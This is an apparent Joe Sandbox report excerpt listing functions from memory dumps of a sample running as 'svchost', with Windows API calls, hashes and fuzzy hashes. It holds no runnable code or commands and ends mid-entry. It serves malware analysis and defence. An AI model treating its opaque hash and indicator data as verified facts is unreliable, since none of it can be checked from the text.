Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417B45

Memory Dump Source

Source File: 00000002.00000002.2635210550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
Instruction ID: 683b89875a7fb83d71da6e1f8a97b79be180c124f2fa609aa3b8b71e39b295bb
Opcode Fuzzy Hash: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
Instruction Fuzzy Hash: F7011EB5E4420DBBDB10DAA5DC42FDEB378AB54308F4041AAE90897240F635EB588B95

Function 0042CA33 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CA63

Memory Dump Source

Source File: 00000002.00000002.2635210550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 66657d5b165b02af58b5b66cdb422c5b63c672e050058a705595915231ac49b7
Instruction ID: 50a5b69ca1682e878e5a40afd65bd8ed1634e2dbd60f648430f8de340d975e9a
Opcode Fuzzy Hash: 66657d5b165b02af58b5b66cdb422c5b63c672e050058a705595915231ac49b7
Instruction Fuzzy Hash: B5E08C763402147BE720FB5AEC42F9B776CDFC5710F10852AFA08A7281C6B4B90186F8

Function 03872B90 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 03872B9A

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ed489058d7c0c3d223a2fe8c5d1c888034d2db14b4b083cf77c01dbae813c4db
Instruction ID: 6f7dc9dc84e8267195c912612bde4f32e2718c40121fee52bd86356cd656078c
Opcode Fuzzy Hash: ed489058d7c0c3d223a2fe8c5d1c888034d2db14b4b083cf77c01dbae813c4db
Instruction Fuzzy Hash: EC90023120108C42D510B398850474A000587D0301F95CC55A5418658DC7A588957121

Function 03872BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03872BCA

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7f01e8f87f4bf353e64586a9bd3a75485b0f1e1a9aa9761b0cd2416d608ad6c2
Instruction ID: cdae8eb10c15a703b9abf52f9fab0b32e7db9a98a82497b724407de0d4cb7e2b
Opcode Fuzzy Hash: 7f01e8f87f4bf353e64586a9bd3a75485b0f1e1a9aa9761b0cd2416d608ad6c2
Instruction Fuzzy Hash: 5F90023120100842D500B7D85508646000587E0301F91D855A6018555EC77588957131

Function 03872A80 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 03872A8A

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 36150536791fb470b700a19735b0ef8889d0b3534bfa97eb93ac220b61bd68bf
Instruction ID: b38caf5e8dc87ec186c855554552f9d8c3db2fb34d0ad267353d4d155fa7d434
Opcode Fuzzy Hash: 36150536791fb470b700a19735b0ef8889d0b3534bfa97eb93ac220b61bd68bf
Instruction Fuzzy Hash: 88900261202004434505B3984514616400A87E0301B91C865E2008590DC63588957125

Function 03872EB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03872EBA

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: adc0372b0e190537875e69598f15e4d2e8c8c35868777d5273c658b91636fa8e
Instruction ID: 0e748b4a429e2f799cff1df3da9667ef6dcdcb54f734d6b0c928e382c455bcc4
Opcode Fuzzy Hash: adc0372b0e190537875e69598f15e4d2e8c8c35868777d5273c658b91636fa8e
Instruction Fuzzy Hash: 6690023120140842D500B398491470B000587D0302F91C855A2158555DC73588557571

Function 03872D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03872D1A

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2f39fca1e5092a39af1b5e9e79c2792af02c729bb85a4434d84eca5581254394
Instruction ID: 43c2b848878c6a37c832f1e18684ad143e5fbedf7fd05c4b5cba2b09e15accde
Opcode Fuzzy Hash: 2f39fca1e5092a39af1b5e9e79c2792af02c729bb85a4434d84eca5581254394
Instruction Fuzzy Hash: 3490023120100853D511B3984604707000987D0341FD1CC56A1418558DD7668956B121

Function 038734E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 038734EA

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d445b3def86bb8bd8944004d2bf67ea4084fe8294ba4a465fb1fe19188c6138b
Instruction ID: 3ced9c95db0e51830220f90e1158efc3a8ccfa86b0017126a78b7821b8bd8874
Opcode Fuzzy Hash: d445b3def86bb8bd8944004d2bf67ea4084fe8294ba4a465fb1fe19188c6138b
Instruction Fuzzy Hash: 0990023160510842D500B3984614706100587D0301FA1CC55A1418568DC7A5895575A2

Function 004142FB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(b427-I_1,00000111,00000000,00000000), ref: 0041437A

Strings

b427-I_1, xrefs: 00414381, 00414384
b427-I_1, xrefs: 0041436F, 00414379, 0041438A

Memory Dump Source

Source File: 00000002.00000002.2635210550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: b427-I_1$b427-I_1
API String ID: 1836367815-3731361855
Opcode ID: e31239851aee85a2536cf6da61f787cff518875e27f6edfaa8e2894a84858e00
Instruction ID: 1c1b804c52c0fa2fc79735cf8757f94194e925b2cf622f9804a62bf2283c9d4a
Opcode Fuzzy Hash: e31239851aee85a2536cf6da61f787cff518875e27f6edfaa8e2894a84858e00
Instruction Fuzzy Hash: 4001A5B2D4111CBAEB119AD19D82DEFBB7CDF40398F00816AFA1467141D6784E468BA5

Function 00414303 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(b427-I_1,00000111,00000000,00000000), ref: 0041437A

Strings

b427-I_1, xrefs: 00414381, 00414384
b427-I_1, xrefs: 0041436F, 00414379, 0041438A

Memory Dump Source

Source File: 00000002.00000002.2635210550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: b427-I_1$b427-I_1
API String ID: 1836367815-3731361855
Opcode ID: c2470579c8be65e49bfd338019fbf368160fbece63dc37d02d7ce0922c0166ce
Instruction ID: 66382633165677f4d287f1c9305a2e0242bca7fee9ac24ed2ff299bc6a34d21b
Opcode Fuzzy Hash: c2470579c8be65e49bfd338019fbf368160fbece63dc37d02d7ce0922c0166ce
Instruction Fuzzy Hash: 9401D6B2E4021CBADB10AAE19C82DEFBB7CDF40798F008169FA1467141D6785E068BB5

Function 004142CD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(b427-I_1,00000111,00000000,00000000), ref: 0041437A

Strings

b427-I_1, xrefs: 00414381, 00414384
b427-I_1, xrefs: 0041436F, 00414379, 0041438A

Memory Dump Source

Source File: 00000002.00000002.2635210550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: b427-I_1$b427-I_1
API String ID: 1836367815-3731361855
Opcode ID: 0c78152fe7af9bfe9666a3fbd71234cde2823069974fff51629e0b809ca46a0d
Instruction ID: e66581b55692d0f67d3645e7f83c5c9d5bac99b1c31a45c43741cea5d306e683
Opcode Fuzzy Hash: 0c78152fe7af9bfe9666a3fbd71234cde2823069974fff51629e0b809ca46a0d
Instruction Fuzzy Hash: C301B5B2E4021CBADB119BD19C81DEFBB7CDF80398F00816AFA2467141D67C4E468BA5

Function 00417B83 Relevance: 1.6, APIs: 1, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.2635210550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e7030420652704376b12194149c07a63f315160b8825ddd380f325685b21786
Instruction ID: 5fe7b0e3159e894076f386ae4157a7bafd75539a6ed586e2fa135baba6e0e4fa
Opcode Fuzzy Hash: 4e7030420652704376b12194149c07a63f315160b8825ddd380f325685b21786
Instruction Fuzzy Hash: 7E21683192D2449FDB21CA75C9866E4BB74FB9A725F1406CBD091CF242D335AC8AC784

Function 0042CD43 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041E8AE,?,?,00000000,?,0041E8AE,?,?,?), ref: 0042CD7B

Memory Dump Source

Source File: 00000002.00000002.2635210550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 27af925cc09fa346fafd11b2d7a9bc6e46addc919f118a8ecb37a125f7b6b630
Instruction ID: f9903ddc43aa1d478041010c95bd812e84ae6d930a69b2ca5004dc81876241ec
Opcode Fuzzy Hash: 27af925cc09fa346fafd11b2d7a9bc6e46addc919f118a8ecb37a125f7b6b630
Instruction Fuzzy Hash: F3E092B1200204BBD710EF49EC41F9B77ACEFC5750F108419FD08A7241D670B910CAB8

Function 0042CD83 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,0B05C6C1,00000007,00000000,00000004,00000000,00417355,000000F4), ref: 0042CDBE

Memory Dump Source

Source File: 00000002.00000002.2635210550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 3ae13e125d1d646a9bdf0d6dc878b17524a9d002341fa1517782c7adab021431
Instruction ID: 9d094757069ee7fafe8343a4ae1169e8157d0d769102895cf672c55cae1e0208
Opcode Fuzzy Hash: 3ae13e125d1d646a9bdf0d6dc878b17524a9d002341fa1517782c7adab021431
Instruction Fuzzy Hash: 7AE092B52002147BDB10EE4ADC41F9B33ACEFC5710F004419FD08A7241C6B0B9108AB8

Function 0042CDD3 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,00000000,?,3D88789B,?,?,3D88789B), ref: 0042CE0A

Memory Dump Source

Source File: 00000002.00000002.2635210550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: d4e777c894d90f951efbef4aca7f82a43814a062413fce3ac0bea4ee7a49ce04
Instruction ID: 98d1125bebf2f9484b9d6ff066c81308abae10eb618a57f9fb154900a1da49d8
Opcode Fuzzy Hash: d4e777c894d90f951efbef4aca7f82a43814a062413fce3ac0bea4ee7a49ce04
Instruction Fuzzy Hash: 40E04F7A2102147BD210BA5ADC01F97776CDFC5714F10446AFA1867241C6B17A01C6F4

Function 03872B2A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 03872B44

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 39b69c3cbc69dc8f352924c9492b0823a9abbb2b68acad9a431d2cfca6165e76
Instruction ID: 23ea0c17eaeb4c8ae265c746fad7bdf29b0661e7ccfbf6f1f913a36c05606348
Opcode Fuzzy Hash: 39b69c3cbc69dc8f352924c9492b0823a9abbb2b68acad9a431d2cfca6165e76
Instruction Fuzzy Hash: 8EB09B719014C5C5DE11E7A0470C7177905A7D0701F55C8D5D2464641F8738D095F275

Non-executed Functions

Function 07953771 Relevance: 1.5, Strings: 1, Instructions: 225COMMON

Download Yara Rule

Strings

L, xrefs: 079537BD

Memory Dump Source

Source File: 00000002.00000002.2649414106.0000000007940000.00000040.00001000.00020000.00000000.sdmp, Offset: 07940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7940000_svchost.jbxd

Similarity

API ID:
String ID: L
API String ID: 0-2909332022
Opcode ID: 0ce391f154ceb796f9badaee825db7987c4e1f0aca813514fcef6248ed3a7fbf
Instruction ID: 5ca45922ecae1f9de2120dd7153133338c9e682f0de428bb761b30997d48232d
Opcode Fuzzy Hash: 0ce391f154ceb796f9badaee825db7987c4e1f0aca813514fcef6248ed3a7fbf
Instruction Fuzzy Hash: 9991E3B020CB948FD7A4DB2CC050B6ABBE2FBD9348F50496DE5DAC3261DA74D841CB42

Function 0387088E Relevance: .6, Instructions: 606COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7cdfc778d27fcb0daa6c3c5deeb25d19594d8d3e7fff55f4ffa30eff6a1b318e
Instruction ID: 40a5f30f5062a4f824276a967b0d58ec5c9dcea26602604b975e0353d8be1d60
Opcode Fuzzy Hash: 7cdfc778d27fcb0daa6c3c5deeb25d19594d8d3e7fff55f4ffa30eff6a1b318e
Instruction Fuzzy Hash: C4426BB59007199FEB60CFA8C880BAAB7F5BF04314F1445E9E959DB241E770EA84CF61

Function 03874260 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 952d418ec5bb29f82c85fc62840270291ec89178fb619acf96684762666e35bc
Instruction ID: 3667784f26712fe24673a140b7baaa2c1c28006e0c84c67f761e62f91a86e567
Opcode Fuzzy Hash: 952d418ec5bb29f82c85fc62840270291ec89178fb619acf96684762666e35bc
Instruction Fuzzy Hash: 60900231605404529540B3984984546400597E0301B91C855E1418554CCB24895A6361

Function 03874570 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 957ab69b264a0b362c49b71054128b24f928462b8a419abb6b0918b513626d68
Instruction ID: 29c0baf9bcd3e6f55a8f3a70cae4474dd4be859051d3ccf1a9fbdce1b54eb957
Opcode Fuzzy Hash: 957ab69b264a0b362c49b71054128b24f928462b8a419abb6b0918b513626d68
Instruction Fuzzy Hash: 95900261601104824540B3984904406600597E13013D1C959A1548560CC7288859A269

Function 03872B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37d528721bc8f249822d14ba64243ed33a6c75b13ad0a05d254c1253f3345e9c
Instruction ID: d51a365967d585da884dc8b924cde9a29cd8633c7c8cae6e0c8325e482472f7a
Opcode Fuzzy Hash: 37d528721bc8f249822d14ba64243ed33a6c75b13ad0a05d254c1253f3345e9c
Instruction Fuzzy Hash: 3590023120100C82D500B3984504B46000587E0301F91C85AA1118654DC725C8557521

Function 03872BE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52c5e7c56cb36bf4c3dcba177f46d1ce70e9be0d180a3305dbba8439485a8dca
Instruction ID: d359121e7a17124a841ae4f124fa55e418d00d6d2a73985f2d50e1dfcffab8f9
Opcode Fuzzy Hash: 52c5e7c56cb36bf4c3dcba177f46d1ce70e9be0d180a3305dbba8439485a8dca
Instruction Fuzzy Hash: 1290022160500842D540B3985518706001587D0301F91D855A1018554DC7698A5976A1

Function 03872B00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70f9062f35ed3a9f3c8f7114d59dd1069b41bcf0e290a358f462556ab0afd78d
Instruction ID: 132bc759521158c5e8a3de0fffd7f515df3b97042dcebf6dc71f98d26c05a1d6
Opcode Fuzzy Hash: 70f9062f35ed3a9f3c8f7114d59dd1069b41bcf0e290a358f462556ab0afd78d
Instruction Fuzzy Hash: DC90023120504C82D540B3984504A46001587D0305F91C855A1058694DD7358D59B661

Function 03872B10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8ba6fb47db0e14853f64c9e23377fee8f5924d1f0bc90743018b09edd249886
Instruction ID: acf3f29e699e68858d761d65e5d57e1de330cebf03588aa4eb2bce3754f58276
Opcode Fuzzy Hash: c8ba6fb47db0e14853f64c9e23377fee8f5924d1f0bc90743018b09edd249886
Instruction Fuzzy Hash: 5C90023120100C42D580B398450464A000587D1301FD1C859A1019654DCB258A5D77A1

Function 03872AA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 361f7d3b80868ef70177d6bfd1f95d1ea632fa100dbb9e0a2cef0e48aabbfe16
Instruction ID: d50c4243694770649c8439389d382a446bbffcb85236523561cc0746069a7dc9
Opcode Fuzzy Hash: 361f7d3b80868ef70177d6bfd1f95d1ea632fa100dbb9e0a2cef0e48aabbfe16
Instruction Fuzzy Hash: 6C90023120100C42D504B3984904686000587D0301F91C855A7018655ED77588957131

Function 03872AC0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e8cb992d6e912d3d4f153c5f83805c4137e2d3f2d4731b3df15fa2307d37d6c
Instruction ID: ecd8691c592ccbfc2b27abeeeb71971ee4cb5b4b232ab02f70f82052b9a076ac
Opcode Fuzzy Hash: 0e8cb992d6e912d3d4f153c5f83805c4137e2d3f2d4731b3df15fa2307d37d6c
Instruction Fuzzy Hash: B290023160500C42D550B3984514746000587D0301F91C855A1018654DC7658A5976A1

Function 03872A10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8e606e45aeabafea2f31cbd44cec2ccecbba39e81bbd310b6931dca22475cc6
Instruction ID: e3967247988b57dcfc15f8ba6b74707145bdb4063cde3e212ac16afea49d2d81
Opcode Fuzzy Hash: a8e606e45aeabafea2f31cbd44cec2ccecbba39e81bbd310b6931dca22475cc6
Instruction Fuzzy Hash: E5900225221004420545F798070450B044597D63513D1C859F240A590CC73188696321

Function 038729D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8455c95a10e903ca6f31d020abe1220e5f462c39560c8b91377248a42486be1e
Instruction ID: 0aa8358dff682bc475d3e41758e7144f60637e928b16ab88305a3a8e2de6141a
Opcode Fuzzy Hash: 8455c95a10e903ca6f31d020abe1220e5f462c39560c8b91377248a42486be1e
Instruction Fuzzy Hash: 589002A1201144D24900F3988504B0A450587E0301B91C85AE2048560CC6358855A135

Function 038729F0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8363cbc85ccd8a99241c2dcb23700e7d666e09f831d4146f796d8f957ec6adcd
Instruction ID: ba3b3a232cc4edf4a4192e5c124e00d91b60ba0966ee2edc6d46a43a0bad1a4e
Opcode Fuzzy Hash: 8363cbc85ccd8a99241c2dcb23700e7d666e09f831d4146f796d8f957ec6adcd
Instruction Fuzzy Hash: C5900225211004430505F7980704507004687D5351391C865F2009550CD73188656121

Function 03872FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2636350116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, Offset: 03800000, based on PE: true

Associated: 00000002.00000002.2636350116.0000000003929000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2636350116.000000000392D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3800000_svchost.jbxd

Similarity

API ID:
String ID:
